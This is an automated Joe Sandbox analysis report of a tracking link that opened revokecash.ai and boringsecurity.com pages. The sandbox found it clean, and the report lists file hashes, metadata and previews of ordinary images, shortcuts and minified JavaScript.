                                                                          IP
                                                                          192.168.2.5
                                                                          127.0.0.1
                                                                          Joe Sandbox version:38.0.0 Ammolite
                                                                          Analysis ID:1357461
                                                                          Start date and time:2023-12-10 17:43:20 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 3m 47s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:browseurl.jbs
                                                                          Sample URL:https://ctrk.klclick.com/l/01HHA7T34SH51AXCSV6CC50V39_2
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:9
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Detection:CLEAN
                                                                          Classification:clean3.win@27/318@60/27
                                                                          EGA Information:Failed
                                                                          HCA Information:
                                                                          • Successful, ratio: 100%
                                                                          • Number of executed functions: 0
                                                                          • Number of non-executed functions: 0
                                                                          Cookbook Comments:
                                                                          • Browse: https://revokecash.ai/
                                                                          • Browse: https://revokecash.ai/learn/faq
                                                                          • Browse: https://revokecash.ai/sponsorships
                                                                          • Browse: https://boringsecurity.com/
                                                                          • Browse: https://discord.gg/boringsecurity
                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                          • Excluded IPs from analysis (whitelisted): 192.178.50.35, 34.104.35.123, 192.178.50.42, 142.251.35.227, 142.250.217.202, 142.250.217.170, 142.250.217.234, 172.217.2.202, 142.250.64.138, 142.250.64.234, 142.250.189.138, 192.178.50.74, 104.91.175.5, 192.229.211.108, 104.91.175.23, 172.217.3.67, 142.250.189.131, 142.251.35.234, 172.217.3.74, 142.250.64.170, 72.21.81.240
                                                                          • Excluded domains from analysis (whitelisted): fonts.googleapis.com, fs.microsoft.com, ocsp.digicert.com, edgedl.me.gvt1.com, content-autofill.googleapis.com, slscr.update.microsoft.com, fonts.gstatic.com, update.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com
                                                                          • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report size exceeded maximum capacity and may have missing network information.
                                                                          No simulations
                                                                          No context
                                                                          No context
                                                                          No context
                                                                          No context
                                                                          No context
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sun Dec 10 15:44:12 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                          Category:dropped
                                                                          Size (bytes):2677
                                                                          Entropy (8bit):3.9812212896610006
                                                                          Encrypted:false
                                                                          SSDEEP:48:8GWdcTgI4HeYidAKZdA19ehwiZUklqehhy+3:8iPpWiy
                                                                          MD5:A2327DF67A84F3A3AC79C23DCA7A43EC
                                                                          SHA1:DB60DE316CD45C7A2F220666E4F2E53A0AE8BDFB
                                                                          SHA-256:527F44D7331AB618289017498B2A8968EF0AA5708DF29041DEC9F451A43A20C1
                                                                          SHA-512:257A9D3597E27A070B4649C1B10BF1740B52BF6CC24885D3888D2BC9EC7D19CF666333C09A54ED6D0FDD82C324264C6952705ADB35761E84094DEFCFB58C87BC
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:L..................F.@.. ...$+.,.........+..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.W......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.W......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.W......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.W............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.W.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sun Dec 10 15:44:12 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                          Category:dropped
                                                                          Size (bytes):2679
                                                                          Entropy (8bit):3.994693372060896
                                                                          Encrypted:false
                                                                          SSDEEP:48:8YdcTgI4HeYidAKZdA1weh/iZUkAQkqehSy+2:8bPp09Q/y
                                                                          MD5:21B3875229BB138F64AF417054614B4F
                                                                          SHA1:C35D344F568E4D4AA70275FA8A5608F060EED602
                                                                          SHA-256:8E0A4F8DB803FF406D472736E1309CB5C27221031288FD00A2DDEC29A378ED39
                                                                          SHA-512:96B12CBBE073F27772A3168B148AB7D72A02672BC19199168A8018E92CFEC538AB14371668D8C1D8AE6BF79C5CAF07D5FA7D46855FB2B9128DAE19E7520AD080
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:L..................F.@.. ...$+.,....Kd...+..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.W......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.W......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.W......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.W............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.W.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                          Category:dropped
                                                                          Size (bytes):2693
                                                                          Entropy (8bit):4.005332301271779
                                                                          Encrypted:false
                                                                          SSDEEP:48:8x5dcTgIsHeYidAKZdA14tseh7sFiZUkmgqeh7sgy+BX:8xAPNMnmy
                                                                          MD5:41478380667679700ED0B75BA30FEE81
                                                                          SHA1:C54DE007A6DFB5D269BBAB8B95FF20BD2EF975BD
                                                                          SHA-256:B05874960C3BF21FA09839F0017BC0997F9B8156A27B4DD5ED83D822021FC4D8
                                                                          SHA-512:9FCA4A42332E50C2512769AAC8C29B0C31C9D2E6054EA8C103F35006B0C42B4421971A262E1F2ACEF9BED77A05EDA308A14792E73B59B192DEC56F9CF605CE8B
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.W......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.W......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.W......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.W............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sun Dec 10 15:44:12 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                          Category:dropped
                                                                          Size (bytes):2681
                                                                          Entropy (8bit):3.997517221231673
                                                                          Encrypted:false
                                                                          SSDEEP:48:8qdcTgI4HeYidAKZdA1vehDiZUkwqehuy+R:8VPpfoy
                                                                          MD5:654AF4DA8386D52A035868208618E101
                                                                          SHA1:555BEF86A410EE79166139CF590275678A358D4E
                                                                          SHA-256:022D11F4AA2B73DB065EDA91E92947700B136298766C9844DFF0444281CCA214
                                                                          SHA-512:8DCFFBB1589B94BF9F33EC1A0F7C6A89D7E03C742C3A24A5FB4490545869C42AEDD34B9FE23983A7820A43C55778F4952B9D8244CF9B87F08F8554DB0E372615
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:L..................F.@.. ...$+.,.........+..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.W......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.W......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.W......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.W............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.W.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sun Dec 10 15:44:12 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                          Category:dropped
                                                                          Size (bytes):2681
                                                                          Entropy (8bit):3.984823869728366
                                                                          Encrypted:false
                                                                          SSDEEP:48:82dcTgI4HeYidAKZdA1hehBiZUk1W1qehEy+C:8pPpf9ky
                                                                          MD5:947918FBEF0DB891F268D5F56A975FFB
                                                                          SHA1:A1FAFA6CEA157A0E95F925AC538BC134683B6087
                                                                          SHA-256:91A2792BD8CAA8AC2FA81315CB670B7DACAB2FA87BEBDEFF5F67E9E6AF0119A4
                                                                          SHA-512:EEF477625DA79738D59C10ACA0EE9FCFD08510D45BAEA7494436C554AF20B9DAD50F2B35F1731B77808BA8CA858E2C7C8663BA2C448BCE0969B50BCA7560D5E4
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:L..................F.@.. ...$+.,.........+..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.W......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.W......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.W......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.W............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.W.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sun Dec 10 15:44:12 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                          Category:dropped
                                                                          Size (bytes):2683
                                                                          Entropy (8bit):3.9944503537441496
                                                                          Encrypted:false
                                                                          SSDEEP:48:8qdcTgI4HeYidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbmy+yT+:8VPpXT/TbxWOvTbmy7T
                                                                          MD5:E27BF57C879810FC25E08C9158A3EF7F
                                                                          SHA1:BD8F310E3FB56D9A2BE4221B5F86A0A7AA592C13
                                                                          SHA-256:B0C2D7DF7A6AB88BF73D35C6E818825EA37F3B92275DBEB6B4F59B4B9B486A97
                                                                          SHA-512:0CAC5C122A82FED8F9FF5A7AF8502528FD852BFB7C4A353FB3F6E28274F69D1EDD650291E95887D6CF61AFECE65E3B7ED5F49420C9B8B9D9479D14F6C244BCB3
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:L..................F.@.. ...$+.,.....R...+..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.W......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.W......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.W......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.W............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.W.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JPEG image data, baseline, precision 8, 156x156, components 3
                                                                          Category:downloaded
                                                                          Size (bytes):5081
                                                                          Entropy (8bit):7.90479028644365
                                                                          Encrypted:false
                                                                          SSDEEP:96:PjODyxKeYSf/tZBv27fB8KTLS8bI3bXd9UspIWNEWr+4qFGOv3qTyH:P3EejnN2bB8KTLwAWr+zvr
                                                                          MD5:BC04E72C32FFEB1D7CEA789D7A42FDA7
                                                                          SHA1:507C5E5E6EDEF0FE6E4CF32B032EE67C45DA8FAE
                                                                          SHA-256:74B9D08548B30C8D427967BBCEFC9CA4DA7DAD3D8D3408775418D37CE0CC466F
                                                                          SHA-512:0DFFDCBD30DDFD99201232C44863FE04C6FC7E2D1DE43C18B520C2D77367992806A67CC8A356358CFF25B36B99FA16049BCB4E7FC032E9385D4336629DB576AC
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://boring-security-cms.s3.amazonaws.com/thumbnail_redzin_temp_1898f990e6.jpeg
                                                                          Preview:.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((..........."........................................L.........................!...1"A.Q.245aqrs.......6tu..#$3RUV....&BDEW.....................................5........................!1A.Qq..."3.a...#24r.b.................?...JU..)J...(BW.J..f.B...eq...K*w;.. R5...6.).Z7....M^.t..#2!3&D.#%.....~-.j[d.......(..o';y....\....M..u...O..U:j.W^../..j..Bs..PW ..i. .1.e..e..^&.......9...u.J.(y.=...[F.....{....)J...)J...(BR...JR.%)X.u..[...m%KZ.....{...s..m;....J..Z.IZP.eg$.$...Z.$9.y.G..........m.X.{3....._....W..m.\m.....UU..~.H...wi...!( ..q.7....{..4....j8\.`..+...ck....d.K....s...R{glT....=:.<.Z#.r.9zI\.....1.5.....Z......k-Z..Z.....A..1..6.Vc.u.......m....m.dHa...s..@$...5..`^....<....JF...|.}.:.Cm..&.JHPXIx..;..qa.....P.z..RJ.m%.'?.M..w...8.v^\..sVn....v..6.s....I#...'.............3&.%1py..h\.@T...x.N.N.okS.7.e.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JPEG image data, baseline, precision 8, 156x156, components 3
                                                                          Category:downloaded
                                                                          Size (bytes):6168
                                                                          Entropy (8bit):7.928258451249203
                                                                          Encrypted:false
                                                                          SSDEEP:192:PHsiKBVJ8qAyekfcdBluDmCElqaOEhAvwdFVJ9ayBUH:kiKBVJ1ekEdBluDNEXhAvwL9aH
                                                                          MD5:94C90D2805419205BEB6356CB82790D1
                                                                          SHA1:39EF2AEB74F5018668DB1441360A46D8C4420965
                                                                          SHA-256:D40DD53DF34C76FCFEFFF89CC24723E49B69D45B0B1D1B37A7BAA6F3EF5EEAE3
                                                                          SHA-512:CDB91C7D3DE2ECEBACA4BB338535240F6BF5BC5F4CA6AA9B1925A4B958A9CC45FEC474F89E1BD1C494DF104338B1FDDC248DA246C26DDD62BA06C26D29546219
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://boring-security-cms.s3.amazonaws.com/thumbnail_baebee_15f9684169.jpg
                                                                          Preview:.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((..........."........................................J..........................!1.."AQ.2aq#b....5R.......$4BSTrs...6Dt..7Vd..................................3.........................!1A.Qa"q2B...#....$3.Rb.............?.xWk..|.}.r._W..E,R.)?.....:.y..e.E...|..C.q).i.$.s_6..Q...q.C..g.5..+...(...J-}Z.:...V..C....T....4;....Z....A...Q.}...t.......Q....>TdoG.*.y.#.....>u2.|..@:....G...).b.ry...QG-.}.o...Hz1.h...}].(H.+..}P.pu......).0dK.wt.jq{FN.......Wi..4..../.K......s.2....y......]^.V...;.J.[.#.E28.\.#.......U..bvw...P...Q}J....W.|D...W.1...Q#....t...s.4y.r...YFI...c...9....LG......V..N2iz.S....:5.Xr.T.iQ`.......t..Z~..|h.Kf:.y}.W.`rw.....>.....q.v-..B.Q-[..(.6..B._...Zu....Zd)......s..%..k...D^.z........Z$..(.H...<...'..rx.J...Z.-.6..f.........}.....hJg ...r?#..._.v..Wyz..1..w'...zR.XA.e# ...G..u...#`...(.`....M..
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (44054), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):44054
                                                                          Entropy (8bit):5.330154132526837
                                                                          Encrypted:false
                                                                          SSDEEP:384:jzqPm1slVZOoOABaH96g4A2IzmxHSw2V3v/s7AQPi+FpDBTznEJ76eu:PqzdD0n2sm1NGHzQrpDZzEJ7Tu
                                                                          MD5:47B7CCB67CCC5E99EE72C0686A8C8A87
                                                                          SHA1:2C3F66A494AED13E316C5479C693000A8AC4D53A
                                                                          SHA-256:892B4B13ABAA738289AC0C7FFF4178F48B67611C83DDDFCD42CDDE04BDB6EFDD
                                                                          SHA-512:FED82470FE290B210C213031C6E0268C9D874F146399B97991F9808D0E50D6122F6D87D1706AD368DCE76537287196C15ADC9AA8C9018FCC045A6FCD155D2B8E
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://boringsecurity.com/_next/static/chunks/98-5331d5e48bc919a7.js
                                                                          Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[98],{39098:function(t,i,r){!function(t,i){"use strict";function h(t,i){if(!t)throw Error(i||"Assertion failed")}function n(t,i){t.super_=i;var r=function(){};r.prototype=i.prototype,t.prototype=new r,t.prototype.constructor=t}function e(t,i,r){if(e.isBN(t))return t;this.negative=0,this.words=null,this.length=0,this.red=null,null!==t&&(("le"===i||"be"===i)&&(r=i,i=10),this._init(t||0,i||10,r||"be"))}"object"==typeof t?t.exports=e:i.BN=e,e.BN=e,e.wordSize=26;try{m="undefined"!=typeof window&&void 0!==window.Buffer?window.Buffer:r(79391).Buffer}catch(t){}function o(t,i){var r=t.charCodeAt(i);return r>=48&&r<=57?r-48:r>=65&&r<=70?r-55:r>=97&&r<=102?r-87:void h(!1,"Invalid character in "+t)}function s(t,i,r){var h=o(t,r);return r-1>=i&&(h|=o(t,r-1)<<4),h}function u(t,i,r,n){for(var e=0,o=0,s=Math.min(t.length,r),u=i;u<s;u++){var a=t.charCodeAt(u)-48;e*=n,o=a>=49?a-49+10:a>=17?a-17+10:a,h(a>=0&&o<n,"Invalid character"),e+=o}return e}fu
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:SVG Scalable Vector Graphics image
                                                                          Category:dropped
                                                                          Size (bytes):508
                                                                          Entropy (8bit):4.778600373408621
                                                                          Encrypted:false
                                                                          SSDEEP:12:tchNS3IICjqeqt1Ujf06FtLsRypIBkTHMRqcxtLiwcb6THb:tchNS3HCjeSFtRmGTYZtOwtT7
                                                                          MD5:75DDC5E71BFFAB303EA577158B738A73
                                                                          SHA1:5B3F2B0FA6C3010D1B78F5742BA408754091734E
                                                                          SHA-256:BAB1B534CFA39FF7ADB4FA1490441BCFDFE9A25DEC0A6B1E3CC0436692F17579
                                                                          SHA-512:218DC2F3D35611715C5F27E2E0D59409363D0818CC24BBD83E6E52A49D47EA2E59FAED318FC431EA18E2ED51ED023ABFB261AA43954ED64A150030270234F2EB
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:<svg viewBox="0 0 512 512" xmlns="http://www.w3.org/2000/svg"><path d="m0 0h512v512h-512z" fill="#012169"/><path d="m512 0v64l-190 192 190 187v69h-67l-191-188-186 188h-68v-68l186-187-186-183v-74h62l192 188 186-188z" fill="#fff"/><path d="m184 324 11 34-153 154h-42v-3zm124-12 54 8 150 147v45zm204-312-192 196-4-44 150-152zm-512 1 193 189-59-8-134-133z" fill="#c8102e"/><path d="m176 0v512h160v-512zm-176 176v160h512v-160z" fill="#fff"/><path d="m0 208v96h512v-96zm208-208v512h96v-512z" fill="#c8102e"/></svg>
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (6457)
                                                                          Category:downloaded
                                                                          Size (bytes):6512
                                                                          Entropy (8bit):5.084382122712596
                                                                          Encrypted:false
                                                                          SSDEEP:192:XGOR3pHxbOLqeLbRAHEK4qysqRZSLVBs4Jqir4dkB:93qlhjW/t8dkB
                                                                          MD5:D3313D3615E41AA86E356D61141D0FA8
                                                                          SHA1:51ECFF0B6D202C5A8756105BEB5D5AC4DFFAD175
                                                                          SHA-256:C9D5849A7718165A8A458FAA897C8563494864EC4E0501D97A96B8C30210783C
                                                                          SHA-512:B12C90446539AAF53F145C81E31F1E9E15CC7F46B0498A2326C2C151CB4BF1620E64ADF272A9C100E739FB4106A37E720726ACEB478EA9B676DE7B0F65E74058
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/31897.ec700144df6b20f401cb.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["31897"],{129334:function(t,r,e){t=e.nmd(t),e("854508"),e("70102"),e("424973"),e("222007"),!function(r){"use strict";var e,n=Object.prototype,o=n.hasOwnProperty,i="function"==typeof Symbol?Symbol:{},a=i.iterator||"@@iterator",c=i.asyncIterator||"@@asyncIterator",u=i.toStringTag||"@@toStringTag",h="object"==typeof t,s=r.regeneratorRuntime;if(s){h&&(t.exports=s);return}function f(t,r,n,o){var i=Object.create((r&&r.prototype instanceof g?r:g).prototype),a=new G(o||[]);return i._invoke=function(t,r,n){var o=p;return function(i,a){if(o===y)throw Error("Generator is already running");if(o===v){if("throw"===i)throw a;return P()}for(n.method=i,n.arg=a;;){var c=n.delegate;if(c){var u=function t(r,n){var o=r.iterator[n.method];if(e===o){if(n.delegate=null,"throw"===n.method){if(r.iterator.return&&(n.method="return",n.arg=e,t(r,n),"throw"===n.method))return d;n.method="throw",n.arg=TypeError("The iterator does not provide a 't
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):156540
                                                                          Entropy (8bit):5.60968279360888
                                                                          Encrypted:false
                                                                          SSDEEP:3072:Lnoqw0ksf+ToX3nw77wZW4Rqyd+Tr+z+d2oNMQv6Tq+YgowOty/V4ycE:btf+sX3wXwZW4Rqyd+td2oNLSTq+Ygo0
                                                                          MD5:402ADDB2EE22520BC44DCA490B9008E3
                                                                          SHA1:CCDEAB13D3EAB7E84DA6B5743E01007C5208E3B9
                                                                          SHA-256:6BDC25FAADD5E6DE66A5D768B157788739957CEE0C7C97732CFE839481F6A2E5
                                                                          SHA-512:D169673D67C8910731BFC0745E1D9A226C922BD2FC320AD915A38CC5B4EC4B159440E8C1EBDDEA574FD49CAE9395F907D5FF88D5DBF97B99F35BB0C987AC1893
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/58247.6146ce4a4e300aea8b79.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["58247"],{142226:function(e,t,l){"use strict";e.exports=l.p+"b92378012a6b664c01b6.png"},449236:function(e,t,l){"use strict";e.exports=l.p+"904091516c5e88480f47.png"},290938:function(e,t,l){"use strict";e.exports=l.p+"7c78ad13c2344f7f4089.svg"},229806:function(e,t,l){"use strict";e.exports=l.p+"6cc337af6e577789bc25.svg"},654125:function(e,t,l){"use strict";e.exports=l.p+"b45b4145db9ac11e2381.svg"},108647:function(e,t,l){"use strict";e.exports=l.p+"ca2118f52077f527edd7.svg"},943005:function(e,t,l){"use strict";e.exports=l.p+"b02c644f3c87d8b5aea8.svg"},52850:function(e,t,l){"use strict";e.exports=l.p+"208304c93f6df4a80167.svg"},433562:function(e,t,l){"use strict";e.exports=l.p+"da1259123a8e2aec4171.svg"},398664:function(e,t,l){"use strict";e.exports=l.p+"9731e8deb0c7ac5dfb42.png"},107680:function(e,t,l){"use strict";e.exports=l.p+"7dfcf19766f513deb774.svg"},379539:function(e,t,l){"use strict";e.exports=l.p+"5b3b95e31a9
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (10148)
                                                                          Category:downloaded
                                                                          Size (bytes):10203
                                                                          Entropy (8bit):5.561548588837762
                                                                          Encrypted:false
                                                                          SSDEEP:192:xyHssHw5kwUNr/Z/euupVNFlTZ8PIvUX6kt6xHFwaVxsOH94:xyH3XleuuzTld8wv2666FF1Hd4
                                                                          MD5:33F84FB15CF138FAC3D6F2D4966F7E7F
                                                                          SHA1:566DA03EF39E3E85B649931B2CF3F9FED1A46B10
                                                                          SHA-256:4AA3B95010DBD089521DDCE28646289616EEDD3027C018635595F9246010F390
                                                                          SHA-512:31B68BB60BDA3E2D95885F3D7751DB7846C2FD916188628EE94C063EBAF22D551764A553FF119A86D8A371C651AF24F8401911700E59A8CB77008557377BB964
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/70941.610eda6b5366c83284d8.js
